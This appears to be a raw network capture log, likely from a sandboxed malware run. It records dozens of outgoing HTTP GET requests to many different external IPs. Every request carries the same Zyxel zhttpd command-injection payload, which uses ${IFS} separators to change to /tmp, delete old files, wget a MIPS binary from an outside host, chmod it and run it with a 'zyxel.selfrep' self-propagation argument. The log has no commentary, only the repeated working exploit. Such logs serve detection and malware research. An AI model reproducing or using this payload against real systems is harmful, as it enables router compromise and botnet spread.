                                                Jan 12, 2024 18:16:30.623869896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6206192.168.2.234803875.92.101.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623925924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6207192.168.2.2344512206.125.228.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.623976946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6208192.168.2.2333616179.199.176.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624025106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6209192.168.2.2354572193.70.74.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624077082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6210192.168.2.2359216106.163.61.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624114037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6211192.168.2.235335099.142.108.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624150038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6212192.168.2.2343650160.181.156.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624166012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6213192.168.2.236087643.255.118.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624237061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6214192.168.2.2343122135.0.9.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624289989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6215192.168.2.2346356193.119.153.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624330044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6216192.168.2.234538281.184.151.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624397039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6217192.168.2.235157888.53.218.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624417067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6218192.168.2.2357166200.28.73.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624440908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6219192.168.2.235590883.187.175.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624500036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6220192.168.2.2343250190.179.234.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624547005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6221192.168.2.2346730192.48.27.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624594927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6222192.168.2.234383431.25.212.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624631882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6223192.168.2.233884277.85.231.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624677896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6224192.168.2.2334024144.197.245.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624722004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6225192.168.2.235983244.152.101.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624783039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6226192.168.2.2335348115.154.167.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624809980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6227192.168.2.234883472.201.80.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624845028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6228192.168.2.234815276.252.61.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624874115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6229192.168.2.23464162.41.45.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624907017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6230192.168.2.2337476213.154.196.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.624968052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6231192.168.2.2346780175.168.145.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625005960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6232192.168.2.2337046200.75.108.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625055075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6233192.168.2.2348352201.158.124.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625083923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6234192.168.2.234880665.240.246.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625117064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6235192.168.2.235809076.39.51.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625144005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6236192.168.2.2340980121.35.147.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625190020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6237192.168.2.2335310181.197.155.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625247002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6238192.168.2.235113477.164.169.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625268936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6239192.168.2.233304281.109.102.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625315905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6240192.168.2.2340872152.137.252.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625363111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6241192.168.2.2352360154.241.245.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625386953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6242192.168.2.2334232142.156.60.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625433922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6243192.168.2.2335292126.227.73.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625468016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6244192.168.2.2338092154.239.18.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625514984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6245192.168.2.233913476.81.11.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625557899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6246192.168.2.2355544111.31.214.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625612020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6247192.168.2.2334574196.34.118.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625649929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6248192.168.2.2352492137.84.37.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625683069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6249192.168.2.2357356118.58.96.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625737906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6250192.168.2.2337956156.214.233.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625777960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6251192.168.2.235598648.221.125.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625806093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6252192.168.2.23456961.145.114.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625835896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6253192.168.2.2357498117.203.233.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625910997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6254192.168.2.2357822136.25.180.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625948906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6255192.168.2.2354322222.80.244.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.625991106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6256192.168.2.2357116166.5.231.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626045942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6257192.168.2.2344610104.85.83.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626081944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6258192.168.2.2347282161.235.72.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626117945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6259192.168.2.2349354145.96.87.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626137018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6260192.168.2.2338604102.216.80.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626167059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6261192.168.2.235353496.16.63.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626200914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6262192.168.2.234740239.53.60.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626267910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6263192.168.2.2347356138.144.150.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626318932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6264192.168.2.2336954134.154.138.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626343012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6265192.168.2.2342904185.22.75.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626391888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6266192.168.2.2352394109.90.59.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626444101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6267192.168.2.2344640180.95.57.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626455069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6268192.168.2.2346732163.231.83.162443
                                                TimestampBytes transferredDirectionData
